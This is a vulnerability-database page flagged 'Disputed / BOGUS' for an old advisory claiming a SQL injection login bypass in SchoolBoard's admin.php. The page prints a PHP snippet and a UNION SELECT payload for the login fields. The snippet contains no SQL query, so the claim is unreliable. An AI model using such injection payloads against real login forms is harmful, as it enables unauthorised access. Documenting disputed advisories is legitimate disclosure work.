Bogus: SchoolBoard (admin.php) Remote Login Bypass SQL Injection Vulnerability ( Ascii Version )

Search:
WLB2

Disputed / BOGUS
SchoolBoard (admin.php) Remote Login Bypass SQL Injection Vulnerability

Published
Credit
Risk
2007.05.17
iLker Kandemir
Medium
CWE
CVE
Local
Remote
CWE-89
CVE-2007-2626
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

# Remote Login Bypass SQL Injection Vulnerability (admin.php)

#

# AYYILDIZ.ORG Presents.

# SchoolBoard [ http://free-php-scripts.net/download.php?id=120 ]

# author : iLker Kandemir < ilkerkandemir <at> mynet.com >

# Tnx : h0tturk,ekin0x,Dr.Max Virus,Gencnesil,Gencturk,Ajann

# Vulnerable; /admin.php

-------------------------------------------------//If login in
if($_POST['password'] != NULL){ <<<---------------------[+] //do all this:

if($_POST['password'] == $ADMIN_PASS){
$_SESSION['is_admin'] = $ADMIN_PASS;
} else {
$message = 'Invalid Access';
}
}

//Check password
if($_SESSION['is_admin'] != $ADMIN_PASS){$_GET['page'] = 'login';}

if($_GET['page'] == NULL){$_GET['page'] = $_POST['page'];}

if($_GET['page'] != 'Add' && $_GET['page'] != 'login'){ <<<-------------------[+] // but the
user/pass don't match

-------------------------------------------------

username : 1/**/union/**/select/**/1,2,3,4/*
password : 1/**/union/**/select/**/1,2,3,4/* (ADMIN_PASS)

Panel: /admin.php logged.

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version